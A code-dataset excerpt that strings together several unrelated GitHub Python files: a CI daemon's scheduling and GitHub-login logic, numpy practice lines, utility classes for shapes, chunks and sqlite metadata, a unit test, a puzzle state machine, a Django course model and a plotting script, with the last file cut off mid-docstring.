event.created_at.strftime('%s +0000'),\n 'push',\n )\n branches['refs/heads/' + event.payload['ref']].append(push)\n if event.type != 'PushEvent':\n continue\n # Format:\n # prev_sha1 sha1 Author Name timestamp +TZOFF push\n push = (\n event.payload.get('before',BOGUS_SHA1), # Older events don't have 'before'\n event.payload['head'],\n cache(gh.user, event.actor.login).name,\n '<%s@github>' % event.actor.login,\n event.created_at.strftime('%s +0000'),\n 'push',\n )\n heads[event.payload['head']] = 1\n branches[event.payload['ref']].append(push)\n\n for branch in branches:\n branches[branch].reverse()\n log_path = os.path.join(self.repo_path, 'logs', branch)\n if os.path.exists(log_path):\n with open(log_path) as fd:\n log = fd.readlines()\n for line in log:\n old, new, junk = line.strip().split(None, 2)\n if new not in heads:\n name, mail, ts, tz, psh = junk.rsplit(None, 4)\n branches[branch].append((old, new, name, mail, '%s %s' % (ts, tz), psh))\n branches[branch].sort(key=lambda x: x[4])\n log = \"\\n\".join([' '.join(push) for push in branches[branch]]) + \"\\n\"\n\n if not os.path.exists(os.path.dirname(log_path)):\n os.makedirs(os.path.dirname(log_path))\n with open(log_path, 'w') as fd:\n fd.write(log)\n else:\n raise GolemError(\"Don't know how to fetch the reflog\")\n\n def schedule(self, job, db):\n ref = job.get('ref', None)\n why = job['why']\n repo = job['repo']\n\n _c = golem.db.commit\n _a = golem.db.action\n _r = golem.db.repository\n _f = golem.db.artefact\n\n refs = {}\n tags = []\n if why == 'reschedule':\n if job['sha1']:\n c = db.execute(_c.select().where(sql.and_(_c.c.ref==job['ref'], _c.c.sha1==job['sha1']))).fetchone()\n if not c:\n self.logger.error(\"Commit %s for ref %s cannot be rescheduled, it does not exist\" % (job['sha1'], job['ref']))\n return\n else:\n c = db.execute(_c.select().where(_c.c.ref==job['ref']).order_by(sql.desc(_c.c.submit_time)).limit(1)).fetchone()\n if not c:\n self.logger.error(\"Cannot reschedule actions for ref %s, no commits were processed yet\" % job['ref'])\n return\n job['prev_sha1'], job['sha1'] = c.prev_sha1, c.sha1\n\n if ref and ref.startswith(('refs/heads', 'refs/tags')):\n refs[ref] = [(job['prev_sha1'], job['sha1'])]\n if ref and ref.startswith('refs/tags'):\n tags = [(ref, 0)]\n\n if why == 'action-started':\n res = db.execute(_a.join(_c).join(_r).select(use_labels=True).where(\n sql.and_(_r.c.name == job['repo'], _c.c.ref==job['ref'], _c.c.sha1==job['sha1'], _a.c.name==job['action']))).fetchone()\n aid, cid = res.action_id, res.commit_id\n db.execute(_a.update().values(status='started', start_time=datetime.datetime.utcfromtimestamp(job['start_time']),\n host=job['host']).where(_a.c.id==aid))\n\n if why == 'action-done':\n res = db.execute(_a.join(_c).join(_r).select(use_labels=True).where(\n sql.and_(_r.c.name == job['repo'], _c.c.ref==job['ref'], _c.c.sha1==job['sha1'], _a.c.name==job['action']))).fetchone()\n aid, cid = res.action_id, res.commit_id\n db.execute(_a.update().values(status=job['result'], start_time=datetime.datetime.utcfromtimestamp(job['start_time']), \n end_time=datetime.datetime.utcfromtimestamp(job['end_time']), duration=job['duration'],\n host=job['host']).where(_a.c.id==aid))\n if job['result'] == 'fail':\n db.execute(_c.update().values(status=job['result']).where(_c.c.id==cid))\n elif db.execute(sql.select([sql.func.count(_a.c.id)]).where(sql.and_(_a.c.status!='success', _a.c.commit==cid))).scalar() == 0:\n db.execute(_c.update().values(status='success').where(_c.c.id==cid))\n artefact_path = os.path.join(self.actions[job['action']].artefact_path, '%s@%s' % (job['ref'], job['sha1']))\n for path, _, files in os.walk(artefact_path):\n for file in files:\n if file != 'log':\n file = os.path.join(path, file)\n rfile = file[len(artefact_path)+len(os.sep):]\n fsha1 = sha1_file(file)\n try:\n db.execute(_f.insert().values(action=aid, filename=rfile, sha1=fsha1))\n except:\n # XXX should reschedule not simply delete things?\n db.execute(_f.update().where(sql.and_(_f.c.action==aid, _f.c.filename==rfile)).values(sha1=fsha1))\n for nf in self.notifiers.values():\n for what in nf.process:\n if fnmatch.fnmatch('action:' + job['action'], what):\n nf.schedule(job)\n\n if why == 'post-receive' and not refs:\n for head in self.git('for-each-ref', '--format', '%(refname)', 'refs/heads').stdout.splitlines():\n lf = os.path.join(self.repo_path, 'logs', 'refs', 'heads', head[11:])\n if not os.path.exists(lf):\n refs[head] = []\n else:\n with open(lf) as fd:\n log = fd.readlines()\n refs[head] = [x.split(None, 2)[:2] for x in log]\n null = '0' * 40\n for tag in self.git('for-each-ref', '--format', '%(refname) %(*objectname) %(objectname) %(taggerdate:raw) %(committerdate:raw)', 'refs/tags').stdout.splitlines():\n data = tag.split()\n if not (data[-2].isdigit() and data[-1][1:].isdigit()):\n # Severely broken tag \n continue\n tag, sha = data[:2]\n ts = data[-2:]\n ts = int(ts[0]) + (-1 if ts[1][0] == '-' else 1) * (3600 * int(ts[1][1:3]) + 60 * int(ts[1][3:]))\n refs[tag] = [(null, sha)]\n tags.append((tag, ts))\n\n if why == 'reschedule':\n # Set actions back to 'new'\n # Set dependent actions back to 'new'\n # Delete files from artefacts\n if job['action']:\n actions = [job['action']]\n else:\n actions = [x.name for x in db.execute(_a.select().where(sql.and_(_a.c.commit==c.id, _a.c.status=='retry'))).fetchall()]\n added = True\n while added:\n added = False\n for aname, action in self.actions.items():\n if aname in actions:\n continue\n for act in actions:\n if 'action:' + act in action.requires:\n added = True\n actions.append(aname)\n break\n for action in actions:\n self.actions[action].clean(job['ref'], job['sha1'])\n db.execute(_a.update().values(status='new',host=None, start_time=None, end_time=None,\n duration=None).where(sql.and_(_a.c.commit==c.id, _a.c.name.in_(actions))))\n\n tags.sort(key=lambda x: x[1], reverse=True)\n\n for aname, action in self.actions.items():\n if job['why'] == 'action-done' and 'action:' + job['action'] not in action.requires:\n continue\n my_tags = []\n for tag in tags:\n tag = tag[0][10:]\n for tag_ in action.tags:\n if tag_ == tag or (hasattr(tag_, 'match') and tag_.match(tag)):\n my_tags.append(tag)\n my_tags = my_tags[:action.backlog+1]\n for ref in refs:\n # Do we want to handle this thing?\n handle = False\n if ref.startswith('refs/heads'):\n head = ref[11:]\n for head_ in action.branches:\n if head_ == head or (hasattr(head_, 'match') and head_.match(head)):\n handle = True\n break\n elif ref.startswith('refs/tags'):\n tag = ref[10:]\n if tag in my_tags:\n handle = True\n\n if not handle:\n continue\n\n for prev_sha1, sha1 in refs[ref][-(action.backlog+1):]:\n cid = db.execute(_c.select().where(_c.c.repository==self.id).where(_c.c.ref==ref).where(_c.c.sha1==sha1)).fetchone()\n cid = cid.id if cid else db.execute(_c.insert().values(repository=self.id, ref=ref, sha1=sha1, prev_sha1=prev_sha1,\n submit_time=now(), status='new')).inserted_primary_key[0]\n act = db.execute(_a.select().where(_a.c.commit==cid).where(_a.c.name==action.name)).fetchone()\n if not act:\n db.execute(_a.insert().values(commit=cid, name=action.name, status='new'))\n act = db.execute(_a.select().where(_a.c.commit==cid).where(_a.c.name==action.name)).fetchone()\n\n # Check if all dependencies have been met\n if action.requires:\n requires = [x.replace('action:','') for x in action.requires]\n actions = db.execute(_a.select().where(_a.c.commit==cid).where(_a.c.name.in_(requires)).where(_a.c.status=='success')).fetchall()\n if len(actions) != len(action.requires):\n continue\n\n if act.status == 'new':\n db.execute(_a.update().where(_a.c.id==act.id).values(status='scheduled'))\n db.execute(_c.update().where(sql.and_(_c.c.id==cid, _c.c.status!='fail')).values(status='in-progress'))\n action.schedule(ref, prev_sha1, sha1)\n\n def git(self, *args, **kwargs):\n res = self.shell.git(*args, **kwargs)\n if res.returncode:\n raise RuntimeError(\"git %s failed: %s\" % (' '.join(args), res.stderr))\n return res\n\n def __repr__(self):\n return '' % (self.name, self.path)\n\nclass Action(IniConfig):\n defaults = {'branches': [], 'tags': [], 'requires': [], 'queue': None, 'backlog': 10, 'ttr': 120, 'publish': []}\n def __init__(self, config, section):\n if config.has_option(section, 'inherit'):\n IniConfig.__init__(self, config, config.get(section, 'inherit'))\n IniConfig.__init__(self, config, section)\n self.name = section[7:]\n self.logger = logging.getLogger('golem.action.' + self.name)\n if isinstance(self.branches, basestring):\n self.branches = self.config['branches'] = [self.branches]\n for idx, branch in enumerate(self.branches):\n if branch.startswith('^'):\n self.branches[idx] = re.compile(branch)\n if isinstance(self.tags, basestring):\n self.tags = self.config['tags'] = [self.tags]\n for idx, tag in enumerate(self.tags):\n if tag.startswith('^'):\n self.tags[idx] = re.compile(tag)\n if isinstance(self.requires, basestring):\n self.requires = self.config['requires'] = [self.requires]\n if isinstance(self.publish, basestring):\n self.publish = self.config['publish'] = [self.publish]\n if isinstance(self.backlog, basestring):\n self.backlog = self.config['backlog'] = int(self.backlog)\n if isinstance(self.ttr, basestring):\n self.ttr = self.config['ttr'] = int(self.ttr)\n if hasattr(self, 'hook'):\n for key, val in self.hook.items():\n if isinstance(val, basestring):\n self.hook[key] = [[val]]\n elif isinstance(val[0], basestring):\n self.hook[key] = [val]\n self.config['hook'] = self.hook\n\n if not self.queue:\n raise ValueError(\"No queue specified\")\n\n def schedule(self, ref, prev_sha1, sha1):\n self.logger.info(\"Scheduling %s for %s@%s\" % (self.name, ref, sha1))\n self.daemon.bs.use(self.queue)\n data = {'repo': self.repo_name, 'ref': ref, 'prev_sha1': prev_sha1, 'sha1': sha1, 'action': self.name}\n data.update(self.config)\n if 'tags' in data:\n data['tags'] = [x.pattern if hasattr(x, 'pattern') else x for x in data['tags']]\n if 'branches' in data:\n data['branches'] = [x.pattern if hasattr(x, 'pattern') else x for x in data['branches']]\n\n self.daemon.bs.put(json.dumps(data), ttr=self.ttr)\n if sha1:\n ref += '@' + sha1\n if not os.path.exists(os.path.join(self.artefact_path, ref)):\n os.makedirs(os.path.join(self.artefact_path, ref))\n\n def clean(self, ref, sha1):\n ref += '@' + sha1\n if os.path.exists(os.path.join(self.artefact_path, ref)):\n shutil.rmtree(os.path.join(self.artefact_path, ref))\n\nclass Notifier(IniConfig):\n defaults = {'process': [], 'queue': None, 'ttr': 120}\n def __init__(self, config, section):\n if config.has_option(section, 'inherit'):\n IniConfig.__init__(self, config, config.get(section, 'inherit'))\n IniConfig.__init__(self, config, section)\n self.name = section[7:]\n self.logger = logging.getLogger('golem.notifier.' + self.name)\n if isinstance(self.process, basestring):\n self.process = self.config['process'] = [self.process]\n if not self.queue:\n raise ValueError(\"No queue specified\")\n\n def schedule(self, job):\n self.logger.info(\"Scheduling %s notifications for %s@%s\" % (job['action'], job['ref'], job['sha1']))\n self.daemon.bs.use(self.queue)\n data = job.copy()\n data.update(self.config)\n self.daemon.bs.put(json.dumps(data), ttr=self.ttr)\n\n# Copied from git-hub\ndef github(try_login=False):\n config_file = os.path.join(os.path.expanduser('~'), '.githubconfig-golem')\n old_umask = os.umask(63) # 0o077\n shell = whelk.Shell()\n\n user = shell.git('config', '--file', config_file, 'github.user').stdout.strip()\n if not user and try_login:\n user = raw_input(\"Github user: \").strip()\n shell.git('config', '--file', config_file, 'github.user', user)\n\n token = shell.git('config', '--file', config_file, 'github.token').stdout.strip()\n if not token and try_login:\n password = getpass.getpass(\"Github password: \")\n auth = github3.authorize(user, password, ['user', 'repo', 'gist'],\n \"Golem on %s\" % socket.gethostname(), \"http://seveas.github.com/golem\")\n token = auth.token\n shell.git('config', '--file', config_file, 'github.token', token)\n shell.git('config', '--file', config_file, 'github.auth_id', str(auth.id))\n\n if not user or not token:\n raise GolemError(\"No github credentials found, try golem --login github\")\n\n gh = github3.login(username=user, token=token)\n try:\n gh.user()\n except github3.GitHubError:\n # Token obsolete\n shell.git('config', '--file', config_file, '--unset', 'github.token')\n gh = github(try_login)\n os.umask(old_umask)\n return gh\n\n_cache={}\ndef cache(fnc, *args):\n if (fnc,) + args not in _cache:\n _cache[(fnc,) + args] = fnc(*args)\n return _cache[(fnc,) + args]\n\ndef sha1_file(file):\n sha = hashlib.new('sha1')\n with open(file) as fd:\n while True:\n data = fd.read(4096)\n if not data:\n break\n sha.update(data)\n return sha.hexdigest()\n","repo_name":"seveas/golem","sub_path":"golem/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":30082,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"25212007695","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 18 15:13:28 2017\n\n@author: Kaustav\n\"\"\"\n\nfam = [1.73,1.68,1.71,1.89]\nfam\nmax(fam)\ntallest = max(fam)\ntallest\nround(1.68,1)\nhelp(round)\nsister=\"liz\"\nsister.replace('z','sa')\nfam.append(\"me\")\nfam\nimport numpy as np\nnp.array([1,2,3])\nheight=[1,2,3,4,5]\nweight=[20,30,40,50,60]\nweight/height**2\n\nnp_height=np.array(height)\nnp_weight=np.array(weight)\nnp_weight/np_height**2\n\npython_list=[1,2,3]\nnumpy_array=np.array([1,2,3])\npython_list+python_list\nnumpy_array+numpy_array\n\nbmi=np.array([1,2,3,4,5])\nbmi\nbmi[1]\nbmi>4\nbmi[bmi>4]\ntype(np_height)","repo_name":"KSTVCHATTERJEE/Py_in_Action","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71123872835","text":"import hashlib\nimport numpy as np\nimport sqlite3\n\nfrom collections import OrderedDict\nfrom dama.utils.decorators import cache\nfrom dama.utils.logger import log_config\nfrom dama.utils.numeric_functions import calc_chunks\nfrom dask.base import normalize_token\n\n\nlog = log_config(__name__)\n__all__ = ['Hash', 'Shape', 'Chunks', 'Login', 'Metadata']\n\n\nclass Hash:\n def __init__(self, hash_fn: str = 'sha1'):\n self.hash_fn = hash_fn\n self.hash = getattr(hashlib, hash_fn)()\n\n def update(self, it):\n # if it.dtype == np.dtype(' list:\n values = []\n for shape in shapes:\n try:\n values.append(shape[dim])\n except IndexError:\n pass\n return values\n\n @cache\n def to_tuple(self) -> tuple:\n # if we have different lengths return dict of shapes\n shapes = list(self.values())\n if len(shapes) == 0:\n return tuple([0])\n elif len(shapes) == 1:\n return shapes[0]\n else:\n nshape = [self.max_length]\n max_shape = max(self.values())\n sum_groups = 0\n for shape in self.values():\n dim = shape[1:2]\n if len(dim) == 0:\n sum_groups += 1\n else:\n if len(shape) == len(max_shape):\n sum_groups += dim[0]\n else:\n sum_groups += 1\n nshape.append(sum_groups)\n remaining = list(max_shape[2:])\n if nshape[0] == 0 and len(max_shape) == 0:\n nshape[0] = 1\n return tuple(nshape + remaining)\n\n def to_chunks(self, chunks) -> 'Chunks':\n if isinstance(chunks, int):\n shape = self.change_length(chunks)\n return Chunks(shape)\n else:\n return Chunks.build_from(chunks, tuple(self.groups()))\n\n @property\n def max_length(self) -> int:\n if super(Shape, self).__len__() > 0:\n values = [a[0] for a in self.values() if len(a) > 0]\n if len(values) > 0:\n return max(values)\n return 0\n\n def change_length(self, length) -> 'Shape':\n shapes = OrderedDict()\n for group, shape in self.items():\n shapes[group] = tuple([length if length < shape[0] else shape[0]] + list(shape[1:]))\n return Shape(shapes)\n\n @staticmethod\n def get_shape_dtypes_from_dict(data_dict) -> tuple:\n shape = dict()\n dtypes = OrderedDict()\n for group, data in data_dict.items():\n shape[group] = data.shape\n dtypes[group] = data.dtype\n return Shape(shape), np.dtype(list(dtypes.items()))\n\n\nclass Chunks(dict):\n static_value = 0\n\n def from_groups(self, chunks: tuple, groups: tuple) -> 'Chunks':\n for group in groups:\n self[group] = chunks\n return self\n\n @staticmethod\n def build_from(chunks, groups: tuple) -> 'Chunks':\n if not isinstance(chunks, Chunks):\n _chunks = Chunks()\n if not hasattr(chunks, '__iter__'):\n chunks = tuple([chunks])\n return _chunks.from_groups(chunks, groups)\n else:\n return chunks\n\n @staticmethod\n def build_from_shape(shape: Shape, dtypes: np.dtype, memory_allowed=.9) -> 'Chunks':\n chunks_dict = calc_chunks(shape, dtypes, memory_allowed=memory_allowed)\n return Chunks(chunks_dict)\n\n @property\n def length(self) -> int:\n return max(r0[0] for r0 in self.values())\n\n\nclass Login(object):\n __slots__ = ['username', 'passwd', 'resource', 'url', 'table', 'host', 'port']\n\n def __init__(self, username: str = None, resource: str = None, passwd: str = None, url=None,\n table: str = None, host: str = None, port: int = None):\n self.username = username\n self.passwd = passwd\n self.resource = resource\n self.url = url\n self.table = table\n self.host = host\n self.port = port\n\n\nclass Metadata(dict):\n\n def __init__(self, driver, *args, **kwargs):\n super(Metadata, self).__init__(*args, **kwargs)\n self.driver = driver\n self.name = self.driver.login.table\n self.driver.build_url(\"metadata\", with_class_name=False)\n\n def __enter__(self):\n self.driver.open()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.driver.close()\n\n def set_schema(self, dtypes: np.dtype, unique_key: list = None):\n self.driver.set_schema(dtypes, unique_key=unique_key)\n\n def insert_data(self):\n try:\n data = [self[group] for group in self.driver.groups]\n self.driver.insert(data)\n except sqlite3.IntegrityError as e:\n log.error(str(e) + \" in \" + self.driver.url)\n\n def insert_update_data(self, keys: list = None):\n try:\n data = [[self[group] for group in self.driver.groups]]\n self.driver[-1] = data\n except sqlite3.IntegrityError as e:\n log.warning(e)\n for key in keys:\n if self.insert_update_keys(key):\n break\n else:\n raise Exception(\"This dataset already exists with another hash\")\n\n def insert_update_keys(self, keys: list):\n if not isinstance(keys, list):\n base_keys = [keys]\n else:\n base_keys = list(keys)\n\n columns = [\"{col}=?\".format(col=group) for group in base_keys]\n query = \"SELECT id FROM {name} WHERE {columns_val}\".format(name=self.name,\n columns_val=\" AND \".join(columns))\n values = tuple([self[key] for key in base_keys])\n query_result = self.query(query, values)\n result = len(query_result) > 0\n if result:\n index = query_result[0][0] - 1\n data = [self[group] for group in self.driver.groups]\n self.driver[index] = data\n return result\n\n def query(self, query: str, values: tuple) -> tuple:\n try:\n cur = self.driver.conn.cursor()\n data = cur.execute(query, values).fetchall()\n cur.close()\n except sqlite3.OperationalError as e:\n log.error(str(e) + \" in \" + self.driver.url)\n else:\n self.driver.conn.commit()\n return data\n\n def data(self):\n chunks = Chunks.build_from(10, self.driver.groups)\n return self.driver.manager(chunks)\n\n def remove_data(self, hash_hex: str):\n self.query(\"DELETE FROM {} WHERE hash = ?\".format(self.name), (hash_hex, ))\n\n def invalid(self, hash_hex: str):\n self.query(\"UPDATE {} SET is_valid=? WHERE hash = ?\".format(self.name), (False, hash_hex,))\n\n def exists(self, hash_hex: str) -> bool:\n result = self.query(\"SELECT id FROM {} WHERE hash = ?\".format(self.name), (hash_hex, ))\n return len(result) > 0\n\n def is_valid(self, hash_hex: str) -> bool:\n result = self.query(\"SELECT is_valid FROM {} WHERE hash = ?\".format(self.name), (hash_hex,))\n return result[0][0]\n","repo_name":"elaeon/dama_ml","sub_path":"src/dama/utils/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":8260,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"33766315357","text":"from datetime import datetime\nfrom Domain.card_client import CardClient\nfrom Repository.repository_json import RepositoryJson\nfrom Service.card_client_service import CardClientService\nfrom Service.undo_redo_service import UndoRedoService\nfrom Tests.utils_tests import clear_file\n\n\ndef test_incrementare_puncte_interval_zile():\n filename = \"Tests/test_incrementare_puncte_interval_zile.json\"\n clear_file(filename)\n carduri_clienti = RepositoryJson(filename)\n card_client_1 = CardClient(\"1\", \"Popescu\", \"Ionela\", \"6110211055573\",\n datetime(2011, 2, 11), datetime(2020, 9, 2), 34)\n carduri_clienti.add(card_client_1)\n card_client_2 = CardClient(\"2\", \"Ionescu\", \"George\", \"5010510079105\",\n datetime(2001, 5, 10), datetime(2021, 1, 7), 17)\n carduri_clienti.add(card_client_2)\n undo_redo_test = UndoRedoService()\n incr_pct_interval_zile = CardClientService(carduri_clienti, undo_redo_test)\n incr_pct_interval_zile.incrementare_puncte_interval_zile(5, 10, 7)\n assert carduri_clienti.read(\"1\") == card_client_1\n card_client_2 = CardClient(\"2\", \"Ionescu\", \"George\", \"5010510079105\",\n datetime(2001, 5, 10), datetime(2021, 1, 7), 24)\n assert carduri_clienti.read(\"2\") == card_client_2\n","repo_name":"alex-ubbcluj/python","sub_path":"lab-8910/Tests/test_incrementare_puncte_interval_zile_service.py","file_name":"test_incrementare_puncte_interval_zile_service.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32164592460","text":"from collections import deque\n\nnumbers = \"98765\"\nk = 2\nqueue = deque(numbers)\nstack = []\ncnt = 0\n\nstack.append(queue.popleft())\n\nwhile queue and cnt<=k:\n print(stack)\n print(cnt)\n # 담으려는 것\n tmp = queue.popleft()\n while stack and stack[-1] < tmp and cntopen' operation\n# 4) Modified since the last 'file->open' operation\n# 5) Unmodified since the last 'file->save' operation\n# 6) Modified since the last 'file->save' operation\n#\n# The state also enables us to track whether there is already a filename\n# associated with the puzzle; if there is, then \"file->save\" can simply\n# save to the associated file; if there isn't, then \"file->save\" needs to\n# behave like \"file->save as\" (and prompt the user for the filename)\n\nclass PuzzleStateMachine():\n\n # Class variables\n __STATE1 = 1 # Unmodified and never saved to a file (new puzzle board)\n __STATE2 = 2 # Modified, but never saved to a file\n __STATE3 = 3 # Unmodified since the last 'file->open' operation\n __STATE4 = 4 # Modified since the last 'file->open' operation\n __STATE5 = 5 # Unmodified since the last 'file->save' operation\n __STATE6 = 6 # Modified since the last 'file->save' operation\n\n # Initial state: State 1, and no associated filename\n __lastFileName = None\n __state = __STATE1\n\n @classmethod\n # Called when File --> New happens; resets the last saved filename and restores the\n # state to __STATE1\n def reset(cls):\n cls.__state = cls.__STATE1\n cls.__lastFileName = None\n\n @classmethod\n # This should be called after File --> Open has taken place. It sets the state to\n # __STATE3, and also saves the filename associated with the loaded file.\n def fileOpened(cls, fileName):\n cls.__state = cls.__STATE3\n cls.__lastFileName = fileName\n\n @classmethod\n # This should be called after a puzzle board has been saved using the File --> Save As\n # menu item, or after saving an unnamed puzzle board for the first time. It will set\n # the state to __STATE5, and will also save the filename associated with the current\n # puzzle\n def fileSavedAs(cls, fileName):\n cls.__state = cls.__STATE5\n cls.__lastFileName = fileName\n\n @classmethod\n # This should be called anytime the current puzzle board is changed by the user.\n # If the current state is __STATE1, then the new state will be __STATE2.\n # If the current state is __STATE3, then the new state will be __STATE4.\n # If the current state is __STATE5, then the new state will be __STATE6.\n # For any other state, no change will take place (because the state is already set to\n # reflect that the puzzle has been changed)\n def puzzleChanged(cls):\n\n if (cls.__state == cls.__STATE1):\n cls.__state = cls.__STATE2\n elif (cls.__state == cls.__STATE3):\n cls.__state = cls.__STATE4\n elif (cls.__state == cls.__STATE5):\n cls.__state = cls.__STATE6\n\n @classmethod\n # Returns 'True' if the state indicates that the puzzle has changed; otherwise, it\n # returns 'False'\n def hasPuzzleChanged(cls):\n return ((cls.__state == cls.__STATE2) or (cls.__state == cls.__STATE4) or\n (cls. __state == cls.__STATE6))\n\n @classmethod\n # Returns the last file name used while saving or opening a puzzle board. The\n # file name may be 'None', if there wasn't yet a save or open request\n def getFileName(cls):\n return(cls.__lastFileName)\n\n","repo_name":"fredtaft/MasyuSolver","sub_path":"PuzzleStateMachine.py","file_name":"PuzzleStateMachine.py","file_ext":"py","file_size_in_byte":3816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25908013046","text":"'''\r\nAuthor:Kalpana Baigar\r\nprogram to check accepted number is prime or not\r\n'''\r\n\r\n#accepting number from user\r\nnum1=\"7\" #takinng input as a sting value\r\nx=int(num1) #converting string type to integer typ\r\nprint(x)\r\nprint(type(x))\r\n\r\ndef prime(num):\r\n \r\n for x in range(2,num): #values in the range of 2 to num-1\r\n if(num%x==0): #if number is divisible\r\n # print(\"not a prime number\") #printing number is prime\r\n return True;\r\n break;\r\n else:\r\n # print(\"prime number\")\r\n return False\r\n\r\niret=prime(x)\r\nif(iret==True):\r\n print(\"not a prime number\") \r\n\r\nelse:\r\n print(\"prime number\")\r\n","repo_name":"baigarkalpana/Python_Numbers","sub_path":"Problems_on_Numbers/prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32480974241","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport uuid\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Member',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('email', models.CharField(max_length=255, db_index=True)),\n ('code_name', models.CharField(max_length=255, db_index=True)),\n ('wish_list', models.TextField()),\n ('member_link', models.UUIDField(default=uuid.uuid4, editable=False)),\n ],\n ),\n migrations.CreateModel(\n name='Organization',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=500, db_index=True)),\n ('org_link', models.UUIDField(default=uuid.uuid4, editable=False)),\n ],\n ),\n migrations.AddField(\n model_name='member',\n name='organization',\n field=models.ForeignKey(related_name='organizations', to='registration.Organization'),\n ),\n migrations.AlterUniqueTogether(\n name='member',\n unique_together=set([('email', 'organization')]),\n ),\n ]\n","repo_name":"juliusmasigan/XmasShuffle","sub_path":"registration/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16886414720","text":"from django.db import models\nimport decimal\n\n# Begin\n# auth:gz\n# create date:7.10\n# description:课程数据库表实体类\n\n# Create your models here.\n\n\nclass Course(models.Model):\n # 课程表\n\n \"\"\"\n type = (\n ('publicBasicCompulsory', '公共基础必修'),\n ('publicBasicElective', '公共基础选修'),\n ('generalEducationCompulsory', '通识教育必修'),\n ('generalEducationElective', '通识教育选修'),\n ('professionalEducationCompulsory', '专业教育必修'),\n ('professionalEducationElective', '专业教育选修'),\n ('publicCompulsory', '公共必修'),\n ('publicElective', '公共选修'),\n ('professionalCompulsory', '专业必修'),\n ('professionalElective', '专业选修'),\n )\n \"\"\"\n\n type = (\n ('社会科学与现代社会', '社会科学与现代社会'),\n ('科学精神与生命关怀', '科学精神与生命关怀'),\n ('艺术体验与审美鉴赏', '艺术体验与审美鉴赏'),\n ('中华文化与世界文明', '中华文化与世界文明'),\n )\n\n ID = models.AutoField(primary_key=True)\n name = models.CharField(max_length=128)\n type = models.CharField(max_length=128, choices=type)\n teacherName = models.CharField(max_length=128)\n college = models.CharField(max_length=128)\n credit = models.DecimalField(max_digits=2, decimal_places=1, default=0)\n # time = models.CharField(max_length=128)\n # c_time = models.DateTimeField(auto_now_add=True)\n\n # 课程号, 课程名, 课程类别, 授课教师, 授课学院, 课程学分, 学时安排\n def __str__(self):\n return str(self.ID) + ' ' + self.name + ' ' + \\\n self.type + ' ' + self.teacherName + ' ' + \\\n self.college + ' ' + str(self.credit)\n\n class Meta:\n ordering = ['ID']\n verbose_name = '课程'\n verbose_name_plural = '课程'\n\n# End\n","repo_name":"ZhiyuLee/University-public-course-shared-resource-management-platform","sub_path":"UPCSPlatForm/CoursePart/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44428272932","text":"import numpy as np\nfrom ridge import PolynomialRidgeApproximation\n\nfrom pgf import PGF\n\n\nX = np.loadtxt('naca_lhs.input')\nfX = np.loadtxt('naca_lhs.output')\nf_drag = fX[:,0]\nf_lift = fX[:,1]\n\nfor fX, name in zip([f_drag, f_lift], ['drag', 'lift']):\n\tpra = PolynomialRidgeApproximation(subspace_dimension = 1, degree = 5, n_init =10)\n\tpra.fit(X, fX)\n\n\tUX = np.dot(pra.U.T, X.T).flatten()\n\n\tI = np.argsort(UX).flatten()\n\ty = pra.predict(X)\n\n\tpgf = PGF()\n\tpgf.add('UX', UX[I][::10])\n\tpgf.add('y', y[I][::10])\n\tpgf.add('fX', fX[I][::10])\n\tpgf.write('fig_naca_%s_ridge.dat' % name)\n\n\n\tpgf = PGF()\n\tpgf.add('i', np.arange(18))\n\tpgf.add('Ui', pra.U.flatten())\n\n\tpgf.write('fig_naca_%s_ridge_U.dat' % name)\n","repo_name":"jeffrey-hokanson/varproridge","sub_path":"fig_naca_ridge.py","file_name":"fig_naca_ridge.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"14784620814","text":"#Richik Ghosh 110120092\r\n\r\n#IMPORTS\r\nimport math\r\n\r\n#INPUTS\r\n\r\nx = int(input())\r\ny = input()\r\n\r\n#CONSTRAINTS\r\n\r\nif x > 100000 and x < 1:\r\n exit()\r\nif (math.log2(x)).is_integer() == False:\r\n exit()\r\nif y.islower() == False:\r\n exit()\r\nif x != len(y):\r\n exit()\r\n\r\n#MAIN CODE\r\n \r\nif x == 1:\r\n print(0)\r\nelse:\r\n count = 0\r\n while int(x) > 0:\r\n x = x / 2\r\n if y[:int(x)] == y[int(x):int(x*2)]:\r\n count += 1\r\n print(count)\r\n \r\n","repo_name":"Richik19/Spider","sub_path":"Task 1/Spider 1B.py","file_name":"Spider 1B.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34869710256","text":"import hashlib\nimport argparse\nimport pymongo\nimport traceback\nimport logging\nfrom ebi_eva_common_pyutils.config_utils import get_mongo_uri_for_eva_profile\n\n\ndef get_SHA1(variant_rec):\n \"\"\"Calculate the 